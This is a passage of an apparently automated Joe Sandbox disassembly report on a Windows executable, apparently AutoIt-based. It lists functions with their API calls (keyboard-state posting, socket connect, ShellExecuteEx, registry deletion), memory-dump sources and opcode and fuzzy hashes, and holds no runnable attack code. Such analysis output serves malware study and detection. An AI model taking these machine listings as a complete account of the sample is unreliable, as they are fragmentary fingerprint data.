                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0033D6D7
                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0033D6F5
                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0033D716
                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0033D735
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0033D75A
                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0033D77D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1211466189-0
                                                                                                                    • Opcode ID: dae52c8cf0bb932bf52df20f609ca043d4e87f82e391cb54ea32d92bca9a29ff
                                                                                                                    • Instruction ID: 5332839eb2b4152978b4be8486a4682bb5234fe8395925bd4bb55dc4a0518462
                                                                                                                    • Opcode Fuzzy Hash: dae52c8cf0bb932bf52df20f609ca043d4e87f82e391cb54ea32d92bca9a29ff
                                                                                                                    • Instruction Fuzzy Hash: 6DB1AA71A00229EFDF1ACF69D9C57AD7BB1BF04701F098069EC589F295D734A990CB90
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,002EC1C7,00000004,00000000,00000000,00000000), ref: 002B2ACF
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,002EC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 002B2B17
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,002EC1C7,00000004,00000000,00000000,00000000), ref: 002EC21A
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,002EC1C7,00000004,00000000,00000000,00000000), ref: 002EC286
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 003170DD
                                                                                                                      • Part of subcall function 002D0DB6: std::exception::exception.LIBCMT ref: 002D0DEC
                                                                                                                      • Part of subcall function 002D0DB6: __CxxThrowException@8.LIBCMT ref: 002D0E01
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00317114
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00317130
                                                                                                                    • _memmove.LIBCMT ref: 0031717E
                                                                                                                    • _memmove.LIBCMT ref: 0031719B
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 003171AA
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003171BF
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 003171DE
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 256516436-0
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 003361EB
                                                                                                                    • GetDC.USER32(00000000), ref: 003361F3
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003361FE
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0033620A
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00336246
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00336257
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0033902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00336291
                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003362B1
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2931989736-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                      • Part of subcall function 002CFC86: _wcscpy.LIBCMT ref: 002CFCA9
                                                                                                                    • _wcstok.LIBCMT ref: 0031EC94
                                                                                                                    • _wcscpy.LIBCMT ref: 0031ED23
                                                                                                                    • _memset.LIBCMT ref: 0031ED56
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 774024439-3081909835
                                                                                                                    APIs
                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00326C00
                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00326C21
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00326C34
                                                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 00326CEA
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00326CA7
                                                                                                                      • Part of subcall function 0030A7E9: _strlen.LIBCMT ref: 0030A7F3
                                                                                                                      • Part of subcall function 0030A7E9: _memmove.LIBCMT ref: 0030A815
                                                                                                                    • _strlen.LIBCMT ref: 00326D44
                                                                                                                    • _memmove.LIBCMT ref: 00326DAD
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3619996494-0
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(00F75548), ref: 0033B3EB
                                                                                                                    • IsWindowEnabled.USER32(00F75548), ref: 0033B3F7
                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0033B4DB
                                                                                                                    • SendMessageW.USER32(00F75548,000000B0,?,?), ref: 0033B512
                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0033B54F
                                                                                                                    • GetWindowLongW.USER32(00F75548,000000EC), ref: 0033B571
                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0033B589
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4072528602-0
APIs
• _memset.LIBCMT ref: 0032F448
• _memset.LIBCMT ref: 0032F511
• ShellExecuteExW.SHELL32(?), ref: 0032F556
  • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
  • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
  • Part of subcall function 002CFC86: _wcscpy.LIBCMT ref: 002CFCA9
• GetProcessId.KERNEL32(00000000), ref: 0032F5CD
• CloseHandle.KERNEL32(00000000), ref: 0032F5FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: 089c6a9c4897670fd9774bc1982b4d8c68486a592edd64090e4e70736de64615
• Instruction ID: b61da1947192c26e49a3ebc60b9170660db1a71011b9d22f0dcefa77020f69b2
• Opcode Fuzzy Hash: 089c6a9c4897670fd9774bc1982b4d8c68486a592edd64090e4e70736de64615
• Instruction Fuzzy Hash: 9961BF75A10629DFCB05EF64D8819AEBBF5FF49310F148069E85AAB361CB30AD51CF90
APIs
• GetParent.USER32(?), ref: 00310F8C
• GetKeyboardState.USER32(?), ref: 00310FA1
• SetKeyboardState.USER32(?), ref: 00311002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00311030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0031104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00311095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 003110B8
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: f4fe0f76afef708ce98a9a23f3e43728c7236df020ebada733e89806c0eb1483
• Instruction ID: ca8389a9383ae1e6369963f90454ec3d66fd39cc9e613b8074b4d1244e5d4bed
• Opcode Fuzzy Hash: f4fe0f76afef708ce98a9a23f3e43728c7236df020ebada733e89806c0eb1483
• Instruction Fuzzy Hash: 8651D3A09047D53DFB3B46348C46BF6BFA95B0E304F098589E2D4898D2C2E9ECD5D751
APIs
• GetParent.USER32(00000000), ref: 00310DA5
• GetKeyboardState.USER32(?), ref: 00310DBA
• SetKeyboardState.USER32(?), ref: 00310E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00310E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00310E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00310EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00310EC9
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: b54d71524c8d81dfe2b95a017ac91aa5720ebd1220d4ac76326e18c880cbd76c
• Instruction ID: 82a375259dacf7f67305086faef9e2b7603ea3d3ab114fea3f9e34d669d9937d
• Opcode Fuzzy Hash: b54d71524c8d81dfe2b95a017ac91aa5720ebd1220d4ac76326e18c880cbd76c
• Instruction Fuzzy Hash: 6251E5A0504BD57DFB3F83758C55BFABEA96B0A300F098889E1D45A8C2C3D5ACD5D760
APIs
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: 5f7568659f1b8a78acaf8dfbac3bf30cb9cb4fb1d771727ceb7f84df3dd9695a
• Instruction ID: a609c587d6c9f2eec368955eb2aa50643c4c80d772bb1dad4acf7bba5483f0e7
• Opcode Fuzzy Hash: 5f7568659f1b8a78acaf8dfbac3bf30cb9cb4fb1d771727ceb7f84df3dd9695a
• Instruction Fuzzy Hash: 7B41C765C20214B6CB16EBB4CC46ACFB3B89F48310F504857E518E3361FB35A6A5CBE6
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0030D5D4
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0030D60A
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0030D61B
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0030D69D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: ,,4$DllGetClassObject
• API String ID: 753597075-733645947
• Opcode ID: dcfb0b717cb76c1651396713fb3a63ef104703a52b423166e184d7b35544fd96
• Instruction ID: 6ca247009a2169180d769230b3c42d5667a5e2eeeb97d114485acad501d75611
• Opcode Fuzzy Hash: dcfb0b717cb76c1651396713fb3a63ef104703a52b423166e184d7b35544fd96
• Instruction Fuzzy Hash: B24182B1601208EFDF06CF94C894A9ABBF9EF44314F5581A9ED099F245D7B2DD44CBA0
APIs
  • Part of subcall function 0031466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00313697,?), ref: 0031468B
  • Part of subcall function 0031466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00313697,?), ref: 003146A4
• lstrcmpiW.KERNEL32(?,?), ref: 003136B7
• _wcscmp.LIBCMT ref: 003136D3
• MoveFileW.KERNEL32(?,?), ref: 003136EB
• _wcscat.LIBCMT ref: 00313733
• SHFileOperationW.SHELL32(?), ref: 0031379F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: 33620d850b70548cd95d7584352e886a0996be7f826ebe8efecbcc1f8420756c
• Instruction ID: 86085490fc79e31082ff4681bb1cc924eadb334686c7746b8a83532b67c1d9f9
• Opcode Fuzzy Hash: 33620d850b70548cd95d7584352e886a0996be7f826ebe8efecbcc1f8420756c
• Instruction Fuzzy Hash: 5B41A271508344AEC756EF64D4919DFB7ECAF8C380F40092EF489C7291EA34D689CB52
APIs
• _memset.LIBCMT ref: 003372AA
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00337351
• IsMenu.USER32(?), ref: 00337369
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003373B1
• DrawMenuBar.USER32 ref: 003373C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: d41fa4f17f65ec9bf4c5a7ed4de2da25dae0bdb11fedd6c6121bfbc82403e185
• Instruction ID: 6b07815904edb4062fcdbc3e34e6274192ec5c907c6786707224f2e4b3c7f579
• Opcode Fuzzy Hash: d41fa4f17f65ec9bf4c5a7ed4de2da25dae0bdb11fedd6c6121bfbc82403e185
• Instruction Fuzzy Hash: 4E4125B9A05209EFDB22DF50D884E9ABBB8FB09320F158429FD55A7260D730AD50DF90
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00330FD4
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00330FFE
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 003310B5
                                                                                                                      • Part of subcall function 00330FA5: RegCloseKey.ADVAPI32(?), ref: 0033101B
                                                                                                                      • Part of subcall function 00330FA5: FreeLibrary.KERNEL32(?), ref: 0033106D
                                                                                                                      • Part of subcall function 00330FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00331090
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00331058
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 395352322-0
                                                                                                                    • Opcode ID: aa1f117d08b28f651ec0b81e50e64b17cf6a3365d721f669136f0e41b1b897de
                                                                                                                    • Instruction ID: f0ed8cf9f20623331db0ca18841ee6663049d5db9c760c997cb7e31c1c03ca11
                                                                                                                    • Opcode Fuzzy Hash: aa1f117d08b28f651ec0b81e50e64b17cf6a3365d721f669136f0e41b1b897de
                                                                                                                    • Instruction Fuzzy Hash: F7310D71D01109BFDB1A9F94DCC9EFFB7BCEF08300F40016AE501A2151EA749E899AA0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003362EC
                                                                                                                    • GetWindowLongW.USER32(00F75548,000000F0), ref: 0033631F
                                                                                                                    • GetWindowLongW.USER32(00F75548,000000F0), ref: 00336354
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00336386
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003363B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003363C1
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003363DB
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2178440468-0
                                                                                                                    • Opcode ID: 492d1a852dc9285ff4d4e151ff5b3c5a317309b2ee6a3b90f81c0a744ada2b26
                                                                                                                    • Instruction ID: 847cec8e3c7b785e6590eb20dc18089addb8841704dda5e76c8863555cc0867c
                                                                                                                    • Opcode Fuzzy Hash: 492d1a852dc9285ff4d4e151ff5b3c5a317309b2ee6a3b90f81c0a744ada2b26
                                                                                                                    • Instruction Fuzzy Hash: D9311639B44150AFDB22CF18DCC6F593BE9FB4A724F1A8164F5058F2B1CB71A8409B51
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030DB2E
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030DB54
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0030DB57
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0030DB75
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0030DB7E
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0030DBA3
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0030DBB1
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: 9f3af8a869f73f169b0656cb8af59a36eb479f69edd249d33af5db3796efe3df
                                                                                                                    • Instruction ID: 8245b86bbecf1b2088ce1d4a0b99dea1fb9448d5e37e29fed2f6dd9b495c8ee6
                                                                                                                    • Opcode Fuzzy Hash: 9f3af8a869f73f169b0656cb8af59a36eb479f69edd249d33af5db3796efe3df
                                                                                                                    • Instruction Fuzzy Hash: B3219236A01219AFDF11DFE9DC88CBB77ECEB09360F418525FA14DB2A0D6749C458B64
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00327DB6
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003261C6
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003261D5
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0032620E
                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00326217
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00326221
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 0032624A
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00326263
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 910771015-0
                                                                                                                    • Opcode ID: 66b7239fe83357f312da6234760189e49074df297f2f83ddf03ec10ef7749ff4
                                                                                                                    • Instruction ID: 953987f3ee2e8e3f1cb1fc9ab6192bd7f107a0dde1dc7dfe461e3ee094ad8105
                                                                                                                    • Opcode Fuzzy Hash: 66b7239fe83357f312da6234760189e49074df297f2f83ddf03ec10ef7749ff4
                                                                                                                    • Instruction Fuzzy Hash: BC319031600228AFDF11AF24DC86BBE77ACEF45750F054429F905AB291CB74AC54CBA1
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                    • Opcode ID: 9c3472170677d31b45f9b742d9a41425744da208b2491ad046cbc5232a7700bb
                                                                                                                    • Instruction ID: 1af6642fd2acc2f5929afef6aa4830bb1e71309fa5ed7b87759b4e0d5fa178d7
                                                                                                                    • Opcode Fuzzy Hash: 9c3472170677d31b45f9b742d9a41425744da208b2491ad046cbc5232a7700bb
                                                                                                                    • Instruction Fuzzy Hash: D8219E722165116FD232E634EC22FB7B3DCDF55780F11403AF442869D1EB919D62C796
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030DC09
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030DC2F
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0030DC32
                                                                                                                    • SysAllocString.OLEAUT32 ref: 0030DC53
                                                                                                                    • SysFreeString.OLEAUT32 ref: 0030DC5C
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0030DC76
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0030DC84
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: 0088a71d5ff037313782cdf5688e6521af2e740240e787a95e5b08a245710998
                                                                                                                    • Instruction ID: 78f1db75fa634ba665501de1bcf0035da0c645917567465ca4411d7541e8aa42
                                                                                                                    • Opcode Fuzzy Hash: 0088a71d5ff037313782cdf5688e6521af2e740240e787a95e5b08a245710998
                                                                                                                    • Instruction Fuzzy Hash: D2216D35605204AFEB15EBE9DC88DAB77ECEB08360F518126F914CB2A0DAB4DC41CB64
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002B1D73
                                                                                                                      • Part of subcall function 002B1D35: GetStockObject.GDI32(00000011), ref: 002B1D87
                                                                                                                      • Part of subcall function 002B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 002B1D91
                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00337632
                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0033763F
                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0033764A
                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00337659
                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00337665
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                    • Opcode ID: dc65a3d2bbb40e7e2de373d573dd7016b50cdc73b9ee8e9892ca5f848e6929f1
                                                                                                                    • Instruction ID: bceeedbca84776145e5ea08d12269b2b526c5c4321e96e04ca8b2805699e4ace
                                                                                                                    • Opcode Fuzzy Hash: dc65a3d2bbb40e7e2de373d573dd7016b50cdc73b9ee8e9892ca5f848e6929f1
                                                                                                                    • Instruction Fuzzy Hash: AB11B6B1110119BFEF158F64CC86EE77F5DEF08798F014115F604A6050C6729C21DBA4
                                                                                                                    APIs
